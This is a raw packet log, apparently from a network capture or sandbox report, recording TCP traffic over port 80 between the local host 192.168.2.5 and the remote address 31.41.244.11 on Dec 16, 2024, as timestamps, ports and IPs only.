Dec 16, 2024 11:03:30.029901028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.029953957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.030895948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.030991077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.031049013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.031939983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.031990051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.032056093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.032107115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.033036947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.033087015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.033143997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.033193111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.035012007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.035048008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.035068989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.035084963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.036156893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.036195993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.036211014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.036250114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.037064075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.037098885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.037117004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.037153959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.037364006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.037405968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.037528038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.037583113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.038392067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.038444996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.038502932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.038556099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.039546967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.039606094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.039669991 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.039724112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.040651083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.040705919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.040752888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.041742086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.041893005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.041904926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.041934967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.042812109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.042861938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.042928934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.042977095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.043854952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.043904066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.043982983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.044029951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.044959068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.045006990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.045095921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.045144081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.046099901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.046148062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.046156883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.046202898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.047122002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.047177076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.047224045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.047280073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.048197985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.048250914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.048332930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.048396111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.049283028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.049335003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.049392939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.049684048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.050364971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.050489902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.050539017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.051443100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.051491022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.051521063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.051563978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.052529097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.052576065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.052639961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.052684069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.053689003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.053869963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.053916931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.054708004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.054750919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.054819107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.054864883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.055788994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.055898905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.055951118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.056874037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.056922913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.056988001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.057065964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.057949066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.058077097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.058123112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.059026003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.059130907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.059178114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.060100079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.060144901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.060225010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.060270071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.061208010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.061253071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.061316967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.061366081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.062319994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.062421083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.062479019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.063390017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.063438892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.063508034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.063553095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.064449072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.064492941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.064552069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.064594984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.065498114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.066293001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.200776100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.200865984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.200921059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.200968027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.201193094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.201242924 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.201344013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.201457977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.202279091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.202332020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.202423096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.202470064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.203377962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.203425884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.203510046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.203557014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.204422951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.204471111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.204538107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.204582930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.205534935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.205583096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.205647945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.205694914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.206600904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.206651926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.206718922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.206765890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.207704067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.207796097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.207808018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.207911968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.208811998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.208870888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.208904982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.208904982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.209851027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.210045099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.210109949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.210954905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.211003065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.211050034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.211097002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.212066889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.212124109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.212173939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.212883949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.213123083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.213174105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.213233948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.213289022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.214200974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.214248896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.214314938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.214390993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.215260983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.215317011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.215456963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.215504885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.216418028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.216474056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.216481924 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.216517925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.217437983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.217498064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.217509031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.217612028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.218539953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.218599081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.218698978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.218749046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.219645977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.219710112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.219763041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.219945908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.220709085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.220762968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.220799923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.220844030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.221781969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.221839905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.221910000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.222104073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.222898006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.222944021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.222995043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.223040104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.223947048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.223999023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.224049091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.224097967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.225063086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.225117922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.225192070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.225241899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.226103067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.226161003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.226243019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.226289034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.227235079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.227294922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.227376938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.227428913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.228261948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.228321075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.228384972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.228861094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.229362011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.229415894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.229473114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.229521036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.230438948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.230500937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.230552912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.230597019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.231524944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.231590033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.231604099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.231651068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.232620001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.232739925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.232795000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.233789921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.233827114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.233829021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.233932018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.234776020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.234826088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.234890938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.235199928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.235866070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.236007929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.236054897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.236962080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.237070084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.237133980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.238012075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.238073111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.238111973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.238156080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.239152908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.239257097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.239304066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.240197897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.240303993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.240358114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.241272926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.241327047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.241388083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.241439104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.242355108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.242419958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.242480993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.242541075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.243581057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.243634939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.243669987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.243694067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.244534969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.244591951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.244647026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.245574951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.245625973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.245667934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.245723963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.245768070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.246685028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.246733904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.246782064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.246828079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.247781992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.247836113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.247961998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.248007059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.248904943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.248997927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.249062061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.249114990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.249969959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.250030994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.250070095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.250117064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.251024961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.251163960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.251221895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.252121925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.252167940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.252249002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.252294064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.253241062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.253290892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.253356934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.253621101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.254317999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.254369020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.254471064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.254517078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.255429029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.255553007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.255605936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.256504059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.256576061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.256632090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.256690979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.257565022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.258745909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.392857075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.392930984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.393012047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.393311024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.393363953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.393438101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.393629074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.394416094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.394469976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.394562960 CET	80	49833	31.41.244.11	192.168.2.5
